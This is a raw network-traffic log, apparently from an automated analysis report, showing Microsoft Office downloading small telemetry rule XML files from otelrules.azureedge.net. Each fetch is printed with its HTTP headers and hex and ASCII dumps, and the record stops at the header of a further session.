                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                68192.168.2.64980513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:00 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144200Z-1657d5bbd48sqtlf1huhzuwq7000000001t000000000hcx9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                69192.168.2.64980413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:00 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                x-ms-request-id: b2c548d6-d01e-0082-4f03-17e489000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144200Z-1657d5bbd48762wn1qw4s5sd3000000001xg00000000hztr
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                70192.168.2.64980113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:00 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 478
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144200Z-1657d5bbd48sqtlf1huhzuwq7000000001vg00000000a9z2
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                71192.168.2.64980213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:00 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144200Z-1657d5bbd48gqrfwecymhhbfm800000000yg000000009qgn
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                72192.168.2.64980313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:00 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 400
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                x-ms-request-id: 11b227e2-601e-0002-7f6b-17a786000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144200Z-1657d5bbd482lxwq1dp2t1zwkc00000001yg000000002pep
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:00 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                73192.168.2.64980613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 425
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                x-ms-request-id: 678daa67-201e-00aa-3f60-173928000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144201Z-1657d5bbd48tqvfc1ysmtbdrg0000000020g0000000075y2
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                74192.168.2.64980913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144201Z-1657d5bbd48762wn1qw4s5sd3000000001wg00000000p2tw
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                75192.168.2.64980713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 448
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 5a5a1e5c-a01e-001e-18f5-1649ef000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144201Z-1657d5bbd48q6t9vvmrkd293mg00000001zg00000000p948
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                76192.168.2.64980813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144201Z-1657d5bbd48sdh4cyzadbb3748000000020g000000005n2h
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                77192.168.2.64981013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
